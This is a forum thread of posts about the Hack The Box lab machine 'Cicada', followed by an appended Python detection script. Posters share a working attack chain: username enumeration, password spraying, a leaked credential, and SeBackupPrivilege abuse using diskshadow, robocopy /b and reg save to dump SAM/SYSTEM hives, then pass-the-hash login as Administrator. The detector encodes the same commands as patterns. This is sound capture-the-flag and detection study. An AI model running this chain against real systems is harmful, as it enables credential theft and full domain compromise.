[HTB] - Cicada
by kevindragonfly - Saturday September 28, 2024 at 03:19 PM
#21
(Sep 28, 2024, 08:39 PM)Dtom Wrote: for root read
https://kb.offsec.nl/tools/techniques/ba...ratortoda/

ty guys for your research!
#22
Easy User and Root

User:

`evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' `

Root:

`robocopy C:\Users\Administrator\Desktop C:\Users\Public root.txt /B`

`type C:\Users\Public\root.txt`
#23
Which wordlist did you guys use to find usernames?

#24
cd into C:\Windows\temp and type this line by line

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append


ls to make sure there is diskshadow.txt and run:

diskshadow.exe /s c:\Windows\temp\diskshadow.txt


Next:

robocopy /b Z:\Windows\System32\Config C:\Windows\temp SAM
robocopy /b Z:\Windows\System32\Config C:\Windows\temp SYSTEM

robocopy /b Z:\Windows\System32\Config C:\Windows\temp SECURITY


Download SAM, SYSTEM, and SECURITY


impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

#25
(Sep 28, 2024, 08:04 PM)notluken Wrote:
(Sep 28, 2024, 07:41 PM)grieving7 Wrote:
(Sep 28, 2024, 07:31 PM)hackemall Wrote: kerbrute    Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop

2024/09/28 14:25:50 >  Using KDC(s):
2024/09/28 14:25:50 >      10.10.11.35:88

2024/09/28 14:25:51 >  [+] VALID USERNAME:    michael.wrightson@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    sarah.dantelia@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    john.smoulder@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    emily.oscars@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    david.orelious@cicada.htb
2024/09/28 14:25:51 >  Done! Tested 5 usernames (5 valid) in 0.073 seconds

Which command did you run?

kerbrute userenum --dc <IP> -d cicada.htb <PATH-TO-WORDLIST>

Which wordlist did you use?

#26
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

evil-winrm -i (IP) -u Administrator -H 2b87e7................................
#27
ROOT:

whoami /priv

SeBackupPrivilege | Back up files and directories | Enabled

cd /
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

cd Temp
download sam
download system


pypykatz registry --sam sam system


evil-winrm -u "Administrator" -H "admin_hash" -i <ip>



more info: https://www.hackingarticles.in/windows-p...privilege/
#28
(Sep 28, 2024, 09:16 PM)hackemall Wrote: cd into C:\Windows\temp and type this line by line

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append


ls to make sure there is diskshadow.txt and run:

diskshadow.exe /s c:\Windows\temp\diskshadow.txt


Next:

robocopy /b Z:\Windows\System32\Config C:\Windows\temp SAM
robocopy /b Z:\Windows\System32\Config C:\Windows\temp SYSTEM

robocopy /b Z:\Windows\System32\Config C:\Windows\temp SECURITY


Download SAM, SYSTEM, and SECURITY


impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

This is the real escalation --> evil-winrm -i cicada.htb -u Administrator -H <HASH>
#29
(Sep 28, 2024, 08:21 PM)spamdegratis5 Wrote: The list of users is obtainable by using --rid-brute in crackmapexec/netexec.
Then you can use crackmapexec to passwordspray the password from the .txt.
From there you need to check the list of users using the set of credentials, you will find another set of credentials, from there you can check the shares again and obtain the last set of credentials.
From there you can obtain system by leveraging the group of that last user.

Thanks, I missed this useful post:

netexec smb $IP -u guest -p '' --rid-brute
netexec smb $IP -u guest -p '' --rid-brute > rid.txt
Save users to wordlist
cat rid.txt | grep SidTypeUser | awk '{print $6}' | awk -F\\ '{print $2}' > users-cicada.txt
Spraying the password found in the HR note:
netexec smb $IP -u users-cicada.txt -p 'Cicada*****'

#30
(Sep 28, 2024, 08:02 PM)osamy7593 Wrote:
(Sep 28, 2024, 07:49 PM)hackemall Wrote: ─(kali㉿kali)-[~/Desktop]
└─$ smbclient //10.10.11.35/DEV -U david.orelious

Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  D        0  Thu Mar 14 12:31:39 2024
  ..                                  D        0  Thu Mar 14 12:21:29 2024
  Backup_script.ps1                  A      601  Wed Aug 28 17:28:22 2024

                4168447 blocks of size 4096. 334899 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (6.2 KiloBytes/sec) (average 6.2 KiloBytes/sec)
smb: \> exit

No passwords work, what did you use?

Default password is in the HR notes.

The Backup Operators group in Windows has special privileges that allow its members to bypass file permissions to back up and restore files. Members of this group can read every file on the system, including files that only the SYSTEM or Administrator accounts have access to, like the SAM, SYSTEM, and SECURITY registry hives. These hives contain critical information, including hashed passwords.

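Posts #24, #27, #28 and #30 above all describe the same chain: an account holding SeBackupPrivilege (Backup Operators) exposes a shadow copy with diskshadow or saves hives with reg save, then copies SAM/SYSTEM/SECURITY out with robocopy /b. As an added example from the detection side (not code from any poster), this Python snippet correlates Windows Security events 4672 (special privileges assigned) and 4688 (process creation) over constructed sample entries; the event tuple shape, rule names and account names are assumptions.

```python
import re

# Constructed sample events (not real logs). Shape: (event_id, user, command line or privilege list).
# 4672 = special privileges assigned to a new logon, 4688 = process creation with command line.
SAMPLE_EVENTS = [
    (4672, "CICADA\\emily.oscars", "SeBackupPrivilege SeRestorePrivilege"),
    (4688, "CICADA\\emily.oscars", "whoami /priv"),
    (4688, "CICADA\\emily.oscars", "diskshadow.exe /s c:\\Windows\\temp\\diskshadow.txt"),
    (4688, "CICADA\\emily.oscars", "robocopy /b Z:\\Windows\\System32\\Config C:\\Windows\\temp SAM"),
    (4688, "CICADA\\emily.oscars", "reg save hklm\\sam c:\\Temp\\sam"),
    (4688, "CICADA\\svc_build", "robocopy /b D:\\share C:\\backup *.log"),  # benign backup job
]

# Each rule matches one step of the hive-dump chain discussed in the thread.
RULES = {
    "diskshadow_script": re.compile(r"\bdiskshadow(\.exe)?\s+/s\b", re.I),
    "reg_save_hive": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I),
    # robocopy in backup mode (/b) reading the registry hive directory, in either argument order
    "robocopy_backup_mode_config": re.compile(
        r"\brobocopy(\.exe)?\b(?=.*\s/b\b)(?=.*\\System32\\Config\b)", re.I),
}


def backup_privilege_users(events):
    """Accounts whose logon was granted SeBackupPrivilege (event 4672)."""
    return {user for eid, user, data in events
            if eid == 4672 and "SeBackupPrivilege" in data}


def find_hive_dump_commands(events):
    """Process-creation events whose command line matches a hive-dump rule."""
    hits = []
    for eid, user, cmd in events:
        if eid != 4688:
            continue
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits.append({"user": user, "rule": name, "cmd": cmd})
    return hits


def correlate(events):
    """Keep only hits where the same account also held SeBackupPrivilege:
    that pairing is what turns Backup Operators membership into a SAM dump."""
    privileged = backup_privilege_users(events)
    return [h for h in find_hive_dump_commands(events) if h["user"] in privileged]


if __name__ == "__main__":
    for hit in correlate(SAMPLE_EVENTS):
        print(f"[{hit['rule']}] {hit['user']}: {hit['cmd']}")
```

A plain robocopy /b against a share is not flagged on its own; the alert fires only for backup-mode reads of System32\Config, diskshadow scripts or reg save of the SAM/SYSTEM/SECURITY hives by an account that was granted SeBackupPrivilege.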